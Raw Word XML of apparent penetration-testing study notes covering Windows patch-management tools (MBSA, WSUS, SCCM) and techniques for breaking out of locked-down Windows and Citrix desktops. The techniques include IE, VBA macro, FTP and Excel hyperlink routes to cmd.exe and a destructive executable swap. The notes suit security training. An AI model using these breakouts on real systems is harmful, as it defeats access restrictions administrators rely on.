    <w:p w:rsidR="0024516A" w:rsidRDefault="0024516A" w:rsidP="001C3AF0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2280"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="OLE_LINK3"/>
      <w:bookmarkStart w:id="2" w:name="OLE_LINK4"/>
      <w:r w:rsidRPr="0024516A">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">hfcli.exe </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidRPr="0024516A">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>-o xml3 -x hfnetchk6b.xml -h 192.168.2.95 -u bob -p 'p4ssw0rd]'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007600C9" w:rsidRDefault="007600C9" w:rsidP="001C3AF0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2280"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003670B4" w:rsidRPr="001C3AF0" w:rsidRDefault="001C3AF0" w:rsidP="00193DE1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C3AF0">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Others:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B60D81" w:rsidRPr="001C3AF0" w:rsidRDefault="00D930D1" w:rsidP="00C827E7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="116"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C3AF0">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Windows Update</w:t>
      </w:r>
      <w:r w:rsidR="00B60D81" w:rsidRPr="001C3AF0">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> with WSUS (without updating)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B60D81" w:rsidRPr="001C3AF0" w:rsidRDefault="00193DE1" w:rsidP="00C827E7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="116"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C3AF0">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Nessus (professional with Credentials)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D930D1" w:rsidRPr="001C3AF0" w:rsidRDefault="00D930D1" w:rsidP="00C827E7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="116"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C3AF0">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">psinfo -h </w:t>
      </w:r>
      <w:r w:rsidR="007E2ACC" w:rsidRPr="001C3AF0">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(lists installed hostfixes)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007E2ACC" w:rsidRPr="00B60D81" w:rsidRDefault="007E2ACC" w:rsidP="00193DE1">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FA3D71" w:rsidRDefault="00FA3D71" w:rsidP="009D6D8E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="00FA3D71">
        <w:t>•</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA3D71">
        <w:tab/>
        <w:t>derive list of missing security patches</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B60D81" w:rsidRDefault="00B60D81" w:rsidP="00B60D81">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00193DE1" w:rsidRDefault="00D930D1" w:rsidP="00C827E7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="115"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B60D81">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>O</w:t>
      </w:r>
      <w:r w:rsidR="00193DE1" w:rsidRPr="00B60D81">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>utput of MBSA</w:t>
      </w:r>
      <w:r w:rsidR="007600C9">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> )use SAXPAR.vbs to see nice results)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B60D81" w:rsidRPr="00B60D81" w:rsidRDefault="00B60D81" w:rsidP="00C827E7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="115"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Missing patch list from windows update.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D930D1" w:rsidRPr="00D930D1" w:rsidRDefault="00D930D1" w:rsidP="00C827E7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="112"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D930D1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>use</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D930D1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> MS website manually (tedious!)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D930D1" w:rsidRPr="00D930D1" w:rsidRDefault="00D930D1" w:rsidP="00C827E7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="112"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D930D1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Dom’s perl script on the wsusscn2.cab</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA3D71" w:rsidRDefault="00FA3D71" w:rsidP="009D6D8E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="00FA3D71">
        <w:t>•</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA3D71">
        <w:tab/>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FA3D71">
        <w:t>reversion</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FA3D71">
        <w:t xml:space="preserve"> to previous state</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA3D71" w:rsidRPr="00D930D1" w:rsidRDefault="00D930D1" w:rsidP="00FA3D71">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D930D1">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Clean up after yourself:</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Use single folder for all uploads and saved files then remove folder on completion</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 xml:space="preserve">Re-enable services </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Restore changed file/registry permissions</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Remove all added user from machine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA3D71" w:rsidRDefault="00FA3D71" w:rsidP="009D6D8E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>E6 - Windows Patch Management Strategies</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA3D71" w:rsidRPr="00FA3D71" w:rsidRDefault="00FA3D71" w:rsidP="009D6D8E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">E6a - </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA3D71">
        <w:t>Knowledge of common windows patch management strategies:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA3D71" w:rsidRDefault="00FA3D71" w:rsidP="009D6D8E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="00FA3D71">
        <w:t>•</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA3D71">
        <w:tab/>
        <w:t>SMS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B11405" w:rsidRPr="00B11405" w:rsidRDefault="00B11405" w:rsidP="00B11405">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B11405">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SMS - System Center Configuration Manager, formerly Systems Management Server (SMS), is a systems management software product by Microsoft for managing large groups of Windows-based computer systems. Configuration Manager provides remote control, patch management, software distribution, operating system deployment, and hardware and software inventory</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="007600C9">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> SMS is now named </w:t>
      </w:r>
      <w:r w:rsidR="007600C9" w:rsidRPr="007600C9">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>System Center Configuration Manager (SCCM)</w:t>
      </w:r>
      <w:r w:rsidR="007600C9">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB6D43" w:rsidRDefault="00FA3D71" w:rsidP="00DB6D43">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="00FA3D71">
        <w:t>•</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA3D71">
        <w:tab/>
        <w:t>SUS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB6D43" w:rsidRPr="00DB6D43" w:rsidRDefault="00DB6D43" w:rsidP="00DB6D43">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4F81BD" w:themeColor="accent1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB6D43">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Software Update Services (SUS) was a tool for centralizing the update of Microsoft Windows systems in a network, developed by Microsoft. SUS works on a server and downloads updates for the specified versions of Windows from the remote Windows Update site, operated by Microsoft. The clients can then download updates from this internal server, rather than connecting directly to Windows Update. This simplifies the management of updates and saves bandwidth.SUS has been superseded by Windows Server Update Services, which use the same principles but allow updating of different Microsoft products, not only Windows.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA3D71" w:rsidRDefault="00FA3D71" w:rsidP="00DB6D43">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="00FA3D71">
        <w:t>•</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA3D71">
        <w:tab/>
        <w:t>WSUS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007600C9" w:rsidRPr="00DB6D43" w:rsidRDefault="007600C9" w:rsidP="007600C9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB6D43">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Windows Server Update Services (WSUS) provides a software update service for Microsoft Windows operating systems and other Microsoft software. WSUS is a locally managed system that works with the public Microsoft Update website to give system administrators more control. By using Windows Server Update Services, administrators can manage the distribution of Microsoft hotfixes and updates released through Automatic Updates to computers in a corporate environment.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007600C9" w:rsidRPr="00DB6D43" w:rsidRDefault="007600C9" w:rsidP="007600C9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB6D43">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WSUS originated as Software Update Services (SUS), which delivered only operating system hotfixes and patches. WSUS builds on SUS by expanding the range of software it can update. The WSUS infrastructure allows automatic downloads of hotfixes, updates, service packs, device drivers and feature packs to clients in an organization from a central server(s), instead of using the public Microsoft Windows Update website.</w:t>
      </w:r>
      <w:r w:rsidR="00DB6D43" w:rsidRPr="00DB6D43">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> This saves bandwidth, time and disk space, as the individual computers in a network do not have to connect to an external server themselves, but connect to a local central server. It also increases administrators' control and allows clients to obtain updates in environments that do not have internet access.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA3D71" w:rsidRDefault="00FA3D71" w:rsidP="009D6D8E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="00FA3D71">
        <w:lastRenderedPageBreak/>
        <w:t>•</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA3D71">
        <w:tab/>
        <w:t>MBSA</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6D8E" w:rsidRPr="00DB6D43" w:rsidRDefault="00DB6D43" w:rsidP="00FA3D71">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB6D43">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Microsoft Baseline Security Analyzer (MBSA) is a software tool released by Microsoft to determine security state by assessing missing security updates and less-secure security settings within Microsoft Windows, Windows components such as Internet Explorer, IIS web server, and products Microsoft SQL Server, and Microsoft Office macro settings. Security updates are determined by the current version of MBSA using the Windows Update Agent present on Windows computes since Windows 2000 Service Pack 3. The less-secure settings, often called Vulnerability Assessment (VA) checks, are assessed based on a hard-coded set of registry and file checks. An example of a VA might be that permissions for one of the directories in the wwwroot folder of IIS could be set at too low a level, allowing unwanted modification of files from outsiders.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA3D71" w:rsidRDefault="00FA3D71" w:rsidP="009D6D8E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">E7 - </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA3D71">
        <w:t>Desktop Lockdown</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA3D71">
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA3D71" w:rsidRPr="00FA3D71" w:rsidRDefault="00FA3D71" w:rsidP="009D6D8E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">E7a - </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA3D71">
        <w:t>Knowledge and understanding of techniques to break out of a locked down Windo</w:t>
      </w:r>
      <w:r>
        <w:t>ws desktop / Citrix environment</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6D8E" w:rsidRPr="00B60D81" w:rsidRDefault="009D6D8E" w:rsidP="00FA3D71">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sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B60D81">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Login Screen:</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Hit &lt;CTRL-F1&gt; to bring up the Task Manager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Word:</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Type file:\\\c:\windows\explorer.exe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IE:</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IE is really locked down, try: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rig</w:t>
      </w:r>
      <w:r w:rsidR="00B60D81" w:rsidRPr="00B60D81">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ht</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00B60D81" w:rsidRPr="00B60D81">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> clicking on a web page - any</w:t>
      </w:r>
      <w:r w:rsidRPr="00B60D81">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">one will do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view</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B60D81">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> source (should launch notepad)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add</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B60D81">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> a link near the top of the src: &lt;a href="file:///c:\windows\system32\cmd.exe"&gt;Command Prompt&lt;/a&gt;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save</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B60D81">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> to desktop (or somewhere writable)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Double click saved file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Click the link you added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Hopefully a command prompt will pop up.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Windows Explorer:</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Windows Explorer is locked down, you might still be able to browse the local disks after a fashion.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auto-complete is turned on, just start typing "c:\" hopefully it will suggest all the files in the route of the C: drive. Keep typing "windows\system32\" and you should see all the files in there. We found that we could discover config files and view them in this way (just press enter when you've typed in the whole filename and notepad will hopefully open). We could also execute files in this way.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Excel:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F4435" w:rsidRPr="00B60D81" w:rsidRDefault="004F4435" w:rsidP="004F4435">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B60D81">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Shortcut Keys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CTRL-F4 - Close Current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CTRL-w - Close Current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CTRL-F11 - New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CTRL-F12 - Open Document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Macros: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First you need to get into the VBA editor. One of these methods will hopefully work for you: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Tools | Macros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Right Click on a chart | Assign Macro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Right Click the little "sheet1" or "macro1" tab near the bottom left | Click view source. If "View Source" is greyed out, just click "Insert..." instead and insert any spreadsheet solution. Now try again. "View Source" should be enabled now. </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Sub runshell</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60D81">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Shell(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B60D81">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"cmd.exe")</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End Sub</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Click the Play button and a nice command prompt should pop up. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F4435" w:rsidRPr="00B60D81" w:rsidRDefault="004F4435" w:rsidP="004F4435">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B11405" w:rsidRPr="00B60D81" w:rsidRDefault="00B11405" w:rsidP="004F4435">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B60D81">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>FTP:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B11405" w:rsidRPr="00B60D81" w:rsidRDefault="00B11405" w:rsidP="00B1140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60D81">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ftp !</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B60D81">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>cmd.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B11405" w:rsidRPr="00B60D81" w:rsidRDefault="00B1140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Hyperlinks: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There are two ways to create a hyperlink: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Simply enter something like this into a cell: file:///c:\winnt\system32\cmd.exe </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F4435" w:rsidRPr="00B60D81" w:rsidRDefault="004F4435" w:rsidP="004F4435">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B60D81">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Press the function button (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B60D81">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Fx</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B60D81">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">) and use the HYPERLINK function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Run System Tools </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B60D81">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>From</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B60D81">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Display Properties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Control Panel &gt; Display &gt; Desktop &gt; Customize &gt; Web &gt; New... &gt; c:\windows\system32\cmd.exe &gt; Ok &gt; Synchronize &gt; Ok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sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B60D81">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Replace Excel.exe</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This is a rather distructive test, so be careful.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Go into an "Open" or "Save" dialog. Navigate to excel.exe. Rename it to excel-backup.exe. Now copy and paste explorer.exe to the excel folder and name it excel.exe. Hopefully next time you try </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B60D81">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>an</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B60D81">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> use excel on this server, explorer will start. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B60D81">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Have never actually tried it.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B60D81">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">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Word / Help:</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How obtain explorer.exe via Help in MS Word.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using MS Word 2000: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Microsoft Word Help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Options </w:t>
      </w:r>
      <w:r w:rsidR="000C7742" w:rsidRPr="00B60D81">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00B60D81">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Internet Options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Under the General Tab click the Settings button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On the screen that follows, click the View Files button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using MS Word 2003 then slightly different method as follows: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About Microsoft Office Word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Click System Info button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Contents </w:t>
      </w:r>
      <w:r w:rsidR="000C7742" w:rsidRPr="00B60D81">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00B60D81">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Options </w:t>
      </w:r>
      <w:r w:rsidR="000C7742" w:rsidRPr="00B60D81">
        <w:rPr>
